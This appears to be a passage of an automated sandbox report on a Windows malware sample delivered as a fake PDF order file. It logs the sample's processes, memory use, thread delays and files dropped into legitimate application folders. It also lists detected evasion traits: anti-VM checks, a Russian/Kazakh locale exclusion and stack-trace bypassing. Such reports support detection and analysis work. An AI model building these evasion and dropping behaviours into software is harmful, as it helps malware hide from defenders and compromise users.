Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BA52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	6_2_00BA52A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	10_2_022952A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_004252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	37_2_004252A0
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_006E52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	42_2_006E52A0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	API/Special instruction interceptor: Address: CF7F5C
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	API/Special instruction interceptor: Address: C377AC
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	API/Special instruction interceptor: Address: BA7B2C

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: 1210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: 2A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 3220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 17E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 20A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2C40000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,

9_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5838
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1731
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4791
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4999
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 483

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
